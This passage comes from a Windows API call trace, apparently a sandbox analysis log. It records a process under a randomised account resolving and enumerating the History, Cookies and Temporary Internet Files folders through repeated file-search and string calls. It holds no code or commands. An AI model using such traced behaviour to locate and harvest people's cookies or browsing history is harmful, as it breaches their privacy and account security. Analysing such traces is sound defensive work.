ftLastWriteTime.dwLowDateTime=0xe31a0b60, ftLastWriteTime.dwHighDateTime=0x1d8a6e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Local", cAlternateFileName="")) returned 0 [0077.482] GetLastError () returned 0x12 [0077.482] FindClose (in: hFindFile=0xe3c998 | out: hFindFile=0xe3c998) returned 1 [0077.482] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\AppData\\", psz="c:\\Users\\kEecfMwgj\\AppData\\Local", len=0x20 | out: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\AppData\\Local") returned 1 [0077.482] SysReAllocStringLen (in: pbstr=0x28fde4*="c:\\Users\\kEecfMwgj\\AppData\\Local", psz="c:\\Users\\kEecfMwgj\\AppData\\Local\\", len=0x21 | out: pbstr=0x28fde4*="c:\\Users\\kEecfMwgj\\AppData\\Local\\") returned 1 [0077.482] SysReAllocStringLen (in: pbstr=0x28fae8*="local", psz="microsoft", len=0x9 | out: pbstr=0x28fae8*="microsoft") returned 1 [0077.482] FindFirstFileW (in: lpFileName="c:\\Users\\kEecfMwgj\\AppData\\Local\\microsoft" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x2cedac90, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x2cedac90, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 0xe3c998 [0077.483] FindNextFileW (in: hFindFile=0xe3c998, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x2cedac90, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x2cedac90, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 0 [0077.483] GetLastError () returned 0x12 [0077.483] FindClose (in: hFindFile=0xe3c998 | out: hFindFile=0xe3c998) returned 1 [0077.483] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\AppData\\Local\\", psz="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft", len=0x2a | out: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft") returned 1 [0077.483] SysReAllocStringLen (in: pbstr=0x28fde4*="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft", psz="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\", len=0x2b | out: pbstr=0x28fde4*="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\") returned 1 [0077.483] SysReAllocStringLen (in: pbstr=0x28fae8*="microsoft", psz="windows", len=0x7 | out: pbstr=0x28fae8*="windows") returned 1 [0077.483] FindFirstFileW (in: lpFileName="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\windows" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x796be670, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xb1ed8fe0, ftLastAccessTime.dwHighDateTime=0x1d73a91, ftLastWriteTime.dwLowDateTime=0xb1ed8fe0, ftLastWriteTime.dwHighDateTime=0x1d73a91, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 0xe3c998 [0077.484] FindNextFileW (in: hFindFile=0xe3c998, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x796be670, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xb1ed8fe0, ftLastAccessTime.dwHighDateTime=0x1d73a91, ftLastWriteTime.dwLowDateTime=0xb1ed8fe0, ftLastWriteTime.dwHighDateTime=0x1d73a91, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 0 [0077.484] GetLastError () returned 0x12 [0077.484] FindClose (in: hFindFile=0xe3c998 | out: hFindFile=0xe3c998) returned 1 [0077.484] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\", psz="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows", len=0x32 | out: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows") returned 1 [0077.484] SysReAllocStringLen (in: pbstr=0x28fde4*="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows", psz="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\", len=0x33 | out: pbstr=0x28fde4*="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\") returned 1 [0077.484] SysReAllocStringLen (in: pbstr=0x28fae8*="windows", psz="history", len=0x7 | out: pbstr=0x28fae8*="history") returned 1 [0077.484] FindFirstFileW (in: lpFileName="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\history" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\history"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x797c9010, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79b34fb0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfe75c620, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="History", cAlternateFileName="")) returned 0xe3c1d8 [0077.485] FindNextFileW (in: hFindFile=0xe3c1d8, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x797c9010, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79b34fb0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfe75c620, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="History", cAlternateFileName="")) returned 0 [0077.485] GetLastError () returned 0x12 [0077.485] FindClose (in: hFindFile=0xe3c1d8 | out: hFindFile=0xe3c1d8) returned 1 [0077.485] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\", psz="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History", len=0x3a | out: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History") returned 1 [0077.485] SysReAllocStringLen (in: pbstr=0x28fde4*="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History", psz="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History\\", len=0x3b | out: pbstr=0x28fde4*="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History\\") returned 1 [0077.488] SysReAllocStringLen (in: pbstr=0x28fad8*=0x0, psz="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History\\", len=0x3b | out: pbstr=0x28fad8*="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History\\") returned 1 [0077.488] SysReAllocStringLen (in: pbstr=0x28fde4*="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History\\", psz="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History", len=0x3a | out: pbstr=0x28fde4*="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History") returned 1 [0077.488] SysReAllocStringLen (in: pbstr=0x28fde8*=0x0, psz="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History", len=0x3a | out: pbstr=0x28fde8*="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History") returned 1 [0077.488] SysReAllocStringLen (in: pbstr=0x332007c*=0x0, psz="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History\\", len=0x3b | out: pbstr=0x332007c*="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History\\") returned 1 [0077.488] SHGetFolderPathW (in: hwnd=0x0, csidl=33, hToken=0x0, dwFlags=0x0, pszPath=0x3323b80 | out: pszPath="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies") returned 0x0 [0077.489] CharLowerBuffW (in: lpsz="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies", cchLength=0x3c | out: lpsz="c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\cookies") returned 0x3c [0077.489] SysReAllocStringLen (in: pbstr=0x332009c*=0x0, psz="c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\cookies", len=0x3c | out: pbstr=0x332009c*="c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\cookies") returned 1 [0077.489] SysReAllocStringLen (in: pbstr=0x33200a0*=0x0, psz="c:", len=0x2 | out: pbstr=0x33200a0*="c:") returned 1 [0077.489] SysReAllocStringLen (in: pbstr=0x33200c0*=0x0, psz="users", len=0x5 | out: pbstr=0x33200c0*="users") returned 1 [0077.489] SysReAllocStringLen (in: pbstr=0x33200e0*=0x0, psz="keecfmwgj", len=0x9 | out: pbstr=0x33200e0*="keecfmwgj") returned 1 [0077.489] SysReAllocStringLen (in: pbstr=0x33200ec*=0x0, psz="appdata", len=0x7 | out: pbstr=0x33200ec*="appdata") returned 1 [0077.490] SysReAllocStringLen (in: pbstr=0x33200f8*=0x0, psz="roaming", len=0x7 | out: pbstr=0x33200f8*="roaming") returned 1 [0077.490] SysReAllocStringLen (in: pbstr=0x3320104*=0x0, psz="microsoft", len=0x9 | out: pbstr=0x3320104*="microsoft") returned 1 [0077.490] SysReAllocStringLen (in: pbstr=0x3320134*=0x0, psz="windows", len=0x7 | out: pbstr=0x3320134*="windows") returned 1 [0077.490] SysReAllocStringLen (in: pbstr=0x3320140*=0x0, psz="cookies", len=0x7 | out: pbstr=0x3320140*="cookies") returned 1 [0077.490] SysReAllocStringLen (in: pbstr=0x28faf0*=0x0, psz="c:", len=0x2 | out: pbstr=0x28faf0*="c:") returned 1 [0077.490] SysReAllocStringLen (in: pbstr=0x28fdd8*=0x0, psz="c:\\", len=0x3 | out: pbstr=0x28fdd8*="c:\\") returned 1 [0077.490] SysReAllocStringLen (in: pbstr=0x28fae8*=0x0, psz="users", len=0x5 | out: pbstr=0x28fae8*="users") returned 1 [0077.490] FindFirstFileW (in: lpFileName="c:\\users" (normalized: "c:\\users"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x791634f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x791634f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0xe3c1d8 [0077.490] FindNextFileW (in: hFindFile=0xe3c1d8, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x791634f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x791634f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0 [0077.491] GetLastError () returned 0x12 [0077.491] FindClose (in: hFindFile=0xe3c1d8 | out: hFindFile=0xe3c1d8) returned 1 [0077.491] SysReAllocStringLen (in: pbstr=0x28fadc*=0x0, psz="c:\\Users", len=0x8 | out: pbstr=0x28fadc*="c:\\Users") returned 1 [0077.491] SysReAllocStringLen (in: pbstr=0x28fdd8*="c:\\Users", psz="c:\\Users\\", len=0x9 | out: pbstr=0x28fdd8*="c:\\Users\\") returned 1 [0077.491] SysReAllocStringLen (in: pbstr=0x28fae8*="users", psz="keecfmwgj", len=0x9 | out: pbstr=0x28fae8*="keecfmwgj") returned 1 [0077.491] FindFirstFileW (in: lpFileName="c:\\Users\\keecfmwgj" (normalized: "c:\\users\\keecfmwgj"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x791634f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xf29f86d0, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf29f86d0, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="kEecfMwgj", cAlternateFileName="KEECFM~1")) returned 0xe3c1d8 [0077.491] FindNextFileW (in: hFindFile=0xe3c1d8, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x791634f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xf29f86d0, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf29f86d0, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="kEecfMwgj", cAlternateFileName="KEECFM~1")) returned 0 [0077.491] GetLastError () returned 0x12 [0077.491] FindClose (in: hFindFile=0xe3c1d8 | out: hFindFile=0xe3c1d8) returned 1 [0077.491] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Users\\", psz="c:\\Users\\kEecfMwgj", len=0x12 | out: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj") returned 1 [0077.491] SysReAllocStringLen (in: pbstr=0x28fdd8*="c:\\Users\\kEecfMwgj", psz="c:\\Users\\kEecfMwgj\\", len=0x13 | out: pbstr=0x28fdd8*="c:\\Users\\kEecfMwgj\\") returned 1 [0077.492] SysReAllocStringLen (in: pbstr=0x28fae8*="keecfmwgj", psz="appdata", len=0x7 | out: pbstr=0x28fae8*="appdata") returned 1 [0077.492] FindFirstFileW (in: lpFileName="c:\\Users\\kEecfMwgj\\appdata" (normalized: "c:\\users\\keecfmwgj\\appdata"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79698510, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 0xe3c1d8 [0077.492] FindNextFileW (in: hFindFile=0xe3c1d8, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79698510, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 0 [0077.492] GetLastError () returned 0x12 [0077.492] FindClose (in: hFindFile=0xe3c1d8 | out: hFindFile=0xe3c1d8) returned 1 [0077.492] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\", psz="c:\\Users\\kEecfMwgj\\AppData", len=0x1a | out: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\AppData") returned 1 [0077.492] SysReAllocStringLen (in: pbstr=0x28fdd8*="c:\\Users\\kEecfMwgj\\AppData", psz="c:\\Users\\kEecfMwgj\\AppData\\", len=0x1b | out: pbstr=0x28fdd8*="c:\\Users\\kEecfMwgj\\AppData\\") returned 1 [0077.492] SysReAllocStringLen (in: pbstr=0x28fae8*="appdata", psz="roaming", len=0x7 | out: pbstr=0x28fae8*="roaming") returned 1 [0077.492] FindFirstFileW (in: lpFileName="c:\\Users\\kEecfMwgj\\AppData\\roaming" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xc7b73660, ftLastAccessTime.dwHighDateTime=0x1da4ad7, ftLastWriteTime.dwLowDateTime=0xc7b73660, ftLastWriteTime.dwHighDateTime=0x1da4ad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 0xe3c1d8 [0077.492] FindNextFileW (in: hFindFile=0xe3c1d8, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xc7b73660, ftLastAccessTime.dwHighDateTime=0x1da4ad7, ftLastWriteTime.dwLowDateTime=0xc7b73660, ftLastWriteTime.dwHighDateTime=0x1da4ad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 0 [0077.492] GetLastError () returned 0x12 [0077.492] FindClose (in: hFindFile=0xe3c1d8 | out: hFindFile=0xe3c1d8) returned 1 [0077.493] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\AppData\\", psz="c:\\Users\\kEecfMwgj\\AppData\\Roaming", len=0x22 | out: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\AppData\\Roaming") returned 1 [0077.493] SysReAllocStringLen (in: pbstr=0x28fdd8*="c:\\Users\\kEecfMwgj\\AppData\\Roaming", psz="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\", len=0x23 | out: pbstr=0x28fdd8*="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\") returned 1 [0077.493] SysReAllocStringLen (in: pbstr=0x28fae8*="roaming", psz="microsoft", len=0x9 | out: pbstr=0x28fae8*="microsoft") returned 1 [0077.493] FindFirstFileW (in: lpFileName="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\microsoft" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x426ba7c0, ftLastAccessTime.dwHighDateTime=0x1d7b065, ftLastWriteTime.dwLowDateTime=0x426ba7c0, ftLastWriteTime.dwHighDateTime=0x1d7b065, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 0xe3c1d8 [0077.493] FindNextFileW (in: hFindFile=0xe3c1d8, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x426ba7c0, ftLastAccessTime.dwHighDateTime=0x1d7b065, ftLastWriteTime.dwLowDateTime=0x426ba7c0, ftLastWriteTime.dwHighDateTime=0x1d7b065, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 0 [0077.493] GetLastError () returned 0x12 [0077.493] FindClose (in: hFindFile=0xe3c1d8 | out: hFindFile=0xe3c1d8) returned 1 [0077.493] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\", psz="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft", len=0x2c | out: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft") returned 1 [0077.493] SysReAllocStringLen (in: pbstr=0x28fdd8*="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft", psz="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\", len=0x2d | out: pbstr=0x28fdd8*="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\") returned 1 [0077.493] SysReAllocStringLen (in: pbstr=0x28fae8*="microsoft", psz="windows", len=0x7 | out: pbstr=0x28fae8*="windows") returned 1 [0077.494] FindFirstFileW (in: lpFileName="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\windows" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x795b3cd0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf96b9c4c, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 0xe3c1d8 [0077.494] FindNextFileW (in: hFindFile=0xe3c1d8, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x795b3cd0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf96b9c4c, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 0 [0077.494] GetLastError () returned 0x12 [0077.494] FindClose (in: hFindFile=0xe3c1d8 | out: hFindFile=0xe3c1d8) returned 1 [0077.494] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\", psz="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows", len=0x34 | out: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows") returned 1 [0077.494] SysReAllocStringLen (in: pbstr=0x28fdd8*="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows", psz="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\", len=0x35 | out: pbstr=0x28fdd8*="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\") returned 1 [0077.494] SysReAllocStringLen (in: pbstr=0x28fae8*="windows", psz="cookies", len=0x7 | out: pbstr=0x28fae8*="cookies") returned 1 [0077.494] FindFirstFileW (in: lpFileName="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\cookies" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\cookies"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x795b3cd0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x76abed20, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x76abed20, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Cookies", cAlternateFileName="")) returned 0xe414c8 [0077.494] FindNextFileW (in: hFindFile=0xe414c8, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x795b3cd0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x76abed20, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x76abed20, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Cookies", cAlternateFileName="")) returned 0 [0077.494] GetLastError () returned 0x12 [0077.494] FindClose (in: hFindFile=0xe414c8 | out: hFindFile=0xe414c8) returned 1 [0077.495] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\", psz="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies", len=0x3c | out: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies") returned 1 [0077.495] SysReAllocStringLen (in: pbstr=0x28fdd8*="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies", psz="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", len=0x3d | out: pbstr=0x28fdd8*="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\") returned 1 [0077.495] SysReAllocStringLen (in: pbstr=0x28fad8*=0x0, psz="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", len=0x3d | out: pbstr=0x28fad8*="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\") returned 1 [0077.496] SysReAllocStringLen (in: pbstr=0x28fdd8*="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", psz="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies", len=0x3c | out: pbstr=0x28fdd8*="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies") returned 1 [0077.496] SysReAllocStringLen (in: pbstr=0x28fddc*=0x0, psz="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies", len=0x3c | out: pbstr=0x28fddc*="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies") returned 1 [0077.496] SysReAllocStringLen (in: pbstr=0x3320080*=0x0, psz="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", len=0x3d | out: pbstr=0x3320080*="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\") returned 1 [0077.496] SHGetFolderPathW (in: hwnd=0x0, csidl=32, hToken=0x0, dwFlags=0x0, pszPath=0x3323b80 | out: pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files") returned 0x0 [0077.496] CharLowerBuffW (in: lpsz="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files", cchLength=0x4b | out: lpsz="c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\temporary internet files") returned 0x4b [0077.496] SysReAllocStringLen (in: pbstr=0x332009c*=0x0, psz="c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\temporary internet files", len=0x4b | out: pbstr=0x332009c*="c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\temporary internet files") returned 1 [0077.496] SysReAllocStringLen (in: pbstr=0x33200a0*=0x0, psz="c:", len=0x2 | out: pbstr=0x33200a0*="c:") returned 1 [0077.497] SysReAllocStringLen (in: pbstr=0x33200c0*=0x0, psz="users", len=0x5 | out: pbstr=0x33200c0*="users") returned 1 [0077.497] SysReAllocStringLen (in: pbstr=0x33200e0*=0x0, psz="keecfmwgj", len=0x9 | out: pbstr=0x33200e0*="keecfmwgj") returned 1 [0077.497] SysReAllocStringLen (in: pbstr=0x33200ec*=0x0, 